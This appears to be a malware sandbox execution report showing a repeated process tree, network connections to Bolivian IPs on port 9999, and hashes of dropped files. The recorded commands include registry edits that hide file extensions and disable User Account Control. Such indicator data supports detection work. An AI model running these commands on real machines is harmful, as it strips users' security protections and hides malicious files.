cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RWYsAQEc.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\lQMQAAow.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\mCEsMIUE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\qWkEEooE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\AIIEscAU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\uKoEAUcg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\lWIEocws.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\HKwYIIQU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\VqskYAMY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\PGwMwQoY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RqgEwMAk.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\eskwkoYM.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\AGUEEoMg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\EyQgYMkg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\SqQggEok.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ccMgwIIo.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZQUsgoMo.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\JawoUoQA.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\LAEIQsgQ.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\FWwcogMQ.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
Network
| Country | Destination | Domain | Proto |
| BO | 200.87.164.69:9999 | tcp | |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 172.217.169.14:80 | google.com | tcp |
| BO | 200.87.164.69:9999 | tcp | |
| GB | 172.217.169.14:80 | google.com | tcp |
| BO | 200.119.204.12:9999 | tcp | |
| BO | 200.119.204.12:9999 | tcp | |
| BO | 190.186.45.170:9999 | tcp | |
| BO | 190.186.45.170:9999 | tcp |
Files
memory/2512-0-0x0000000000400000-0x0000000000433000-memory.dmp
\Users\Admin\nUkEsQoc\TecsYMkQ.exe
| MD5 | e739ec5ae58676f3a895749025a6756c |
| SHA1 | f0676667ed2bbb540feb218d17566ecdbae70873 |
| SHA256 | 09fd8dc5153f562ef51e3c0112e69a8a8280a2149e59a76d91ef08bdc73a8b75 |
| SHA512 | 46f7871f44fa3e531c48d8f163a6ba72e43df4abe1f14a11d45ed702f926efadf703a18ddcb509926ccb72392a2b0b42c2d3175e4aae836fa1121916fcd5b841 |
memory/2512-4-0x00000000004B0000-0x00000000004E0000-memory.dmp
memory/2336-13-0x0000000000400000-0x0000000000430000-memory.dmp
memory/2120-30-0x0000000000400000-0x0000000000433000-memory.dmp
C:\ProgramData\EMkwoYcY\KSkkUMoA.exe
| MD5 | dcbd2112f3ad1f419648ef879e157e14 |
| SHA1 | 2e695c3b1898b3ab59ca1421dac71b51dc97d22a |
| SHA256 | 7ded75be6758fc9d2081f3fa3ed56f8b4207819054616e84cab875691831a713 |
| SHA512 | 68ad9b9b6826347a94b0e511c7bd3244f7e5529fe263f8b3b57165d6025d5dbbe6db45e2c00d9cee412030cd7c14fe248ebb2485b60258528f51c89b3a202a02 |
C:\Users\Admin\AppData\Local\Temp\fIsoEAss.bat
| MD5 | 65a342a35898184aab26b26198e74548 |
| SHA1 | beaec2817fb19f06843a4b5e2fc47e4d8d690111 |
| SHA256 | fca64b6d236cdad9e833bb8b7e242585fef126254b42d5c57927a6f10f2b7cb2 |
| SHA512 | 20b087d8fa1852d8383579fafb8f69b03b6c2c712f7dec6e1563f4269a326b53c4b20e2f6d2848fd26c4aceba9b782575e3798618052fada10183a34be2cf5c9 |
memory/2512-22-0x00000000004B0000-0x00000000004E3000-memory.dmp
memory/2276-32-0x0000000000400000-0x0000000000433000-memory.dmp
memory/2888-31-0x0000000000850000-0x0000000000883000-memory.dmp
memory/2512-41-0x0000000000400000-0x0000000000433000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xqIMcsMo.bat
| MD5 | bae1095f340720d965898063fede1273 |
| SHA1 | 455d8a81818a7e82b1490c949b32fa7ff98d5210 |
| SHA256 | ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a |
| SHA512 | 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024 |
C:\Users\Admin\AppData\Local\Temp\file.vbs
| MD5 | 4afb5c4527091738faf9cd4addf9d34e |
| SHA1 | 170ba9d866894c1b109b62649b1893eb90350459 |
| SHA256 | 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc |
| SHA512 | 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5 |
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
| MD5 | 465608ce506144bb84af2ccfc475e15b |
